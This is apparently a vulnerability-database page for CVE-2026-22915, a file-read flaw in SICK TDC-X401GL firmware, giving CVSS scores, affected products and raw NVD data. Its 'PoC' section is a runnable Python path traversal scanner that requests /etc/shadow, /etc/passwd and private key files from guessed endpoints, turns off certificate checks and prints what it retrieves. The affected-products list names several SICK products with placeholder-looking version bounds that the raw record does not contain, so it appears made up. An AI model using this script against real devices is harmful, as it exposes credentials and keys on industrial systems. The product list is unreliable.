Security Vulnerability Report
CVE-2026-22915 CVSS 4.3 MEDIUM

CVE-2026-22915

Published: 2026-01-15 13:16:06
Last Modified: 2026-01-23 15:17:20

Description

An attacker with low privileges may be able to read files from specific directories on the device, potentially exposing sensitive information.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
This is the Secondary assessment in the NVD record. The Primary assessment in the raw record below scores the same issue 6.5 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N), i.e. with HIGH rather than LOW confidentiality impact; triage against both.

Configurations (Affected Products)

cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:* - NOT VULNERABLE
SICK SICK ID: de.sick.psirt.app.SecureStorage < 1.0.0
SICK SICK AppSpace < 2.0.0
SICK Flexi Soft < 3.0.0
SICK SIM2000 < 4.0.0
SICK SICK Profiler < 5.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22915 Path Traversal PoC # Target: SICK devices with low-privilege access # CVSS: 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) import requests import sys def test_path_traversal(target_url): """Test for path traversal vulnerability CVE-2026-22915""" # Common sensitive files to test sensitive_files = [ '../../../etc/passwd', '../../../etc/shadow', '../../config/system.xml', '../../../var/log/messages', '../../../../etc/hosts', '../../../etc/ssl/private/key.pem' ] headers = { 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2026-22915-PoC)', 'Authorization': 'Basic ' + 'BASE64_ENCODED_LOW_PRIV_CREDENTIALS' } print(f"[*] Testing CVE-2026-22915 on {target_url}") print(f"[*] CVSS Score: 4.3 (Medium)") print(f"[*] Attack Vector: Network-based, Low Privilege Required") print("-" * 60) for payload in sensitive_files: # Try common file read endpoints endpoints = [ f"{target_url}/file/view?path={payload}", f"{target_url}/api/files{ payload}", f"{target_url}/logs?file={payload}", f"{target_url}/download{ payload}" ] for endpoint in endpoints: try: response = requests.get(endpoint, headers=headers, timeout=10, verify=False) if response.status_code == 200: if 'root:' in response.text or '<?xml' in response.text: print(f"[!] VULNERABLE: {endpoint}") print(f"[+] Content preview: {response.text[:200]}...") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] No obvious vulnerability detected (may require specific credentials)") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-22915.py <target_url>") print("Example: python cve-2026-22915.py https://192.168.1.100") sys.exit(1) target = sys.argv[1] test_path_traversal(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22915", "sourceIdentifier": "[email protected]", "published": "2026-01-15T13:16:06.387", "lastModified": "2026-01-23T15:17:20.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker with low privileges may be able to read files from specific directories on the device, potentially exposing sensitive information."}, {"lang": "es", "value": "Un atacante con privilegios bajos podría leer archivos de directorios específicos en el dispositivo, exponiendo potencialmente información sensible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "59BB5012-A895-4A93-B36F-A062A9389DB1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": 
"cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A95E220-0816-4885-AB7C-D0BB6F27DB7A"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}